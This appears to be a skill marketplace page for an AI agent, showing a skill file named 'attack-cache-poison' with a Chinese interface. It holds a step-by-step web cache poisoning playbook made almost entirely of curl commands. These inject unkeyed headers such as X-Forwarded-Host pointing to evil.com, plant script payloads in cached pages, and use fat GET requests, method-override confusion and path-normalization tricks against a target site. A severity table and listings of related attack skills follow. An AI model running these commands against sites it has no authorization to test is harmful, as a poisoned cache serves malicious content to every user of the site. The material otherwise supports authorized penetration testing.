在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用attack-cache-poison
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
星标334
分支61
更新时间2026年6月1日 19:16
SKILL.md
readonly
安装命令
适用职业SOC
菜单
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
| name | attack-cache-poison |
| description | Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cache-poisoning","web","xss","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444","CWE-525"] |
| chains_with | ["attack-host-header","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"} |
Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.
# Check cache headers
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"
# Identify cache key components (vary header)
curl -s -D- https://TARGET/ | grep -i "vary"
Test headers that are reflected in response but NOT part of cache key:
# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"
# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"
# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"
# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"
# Poison with XSS payload
curl -s https://TARGET/ \
-H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"
# Wait for cache to store, then verify
curl -s https://TARGET/ | grep "alert(1)"
# Find parameters not in cache key
curl -s "https://TARGET/?cb=123" -D- | grep "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"
# Reflected unkeyed parameter → stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"
# Fat GET — body in GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"
# POST → GET cache confusion
curl -s https://TARGET/ -X POST \
-H "X-HTTP-Method-Override: GET" \
-d "param=evil"
# Path normalization differences
curl -s "https://TARGET/path/../admin"
curl -s "https://TARGET/PATH" vs "https://TARGET/path"
curl -s "https://TARGET/path;.js"
| Finding | Severity |
|---|---|
| Cached XSS payload served to other users | Critical (P1) |
| Cached redirect to attacker domain | High (P2) |
| Denial of service via cache poisoning (error page cached) | Medium (P3) |
| Unkeyed header reflected (no cache impact proven) | Low (P4) |
CORS misconfiguration testing — origin reflection, wildcard bypass, null origin, credential leakage
GraphQL vulnerability testing — introspection exposure, complexity DoS, batch abuse, mutation auth bypass
Host header injection — password reset poisoning, cache poisoning, routing bypass, SSRF via Host
IDOR automated testing — cross-account access, horizontal/vertical privilege escalation, mass data exposure
JWT token attacks — alg:none bypass, key confusion, claim tampering, signature stripping
Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains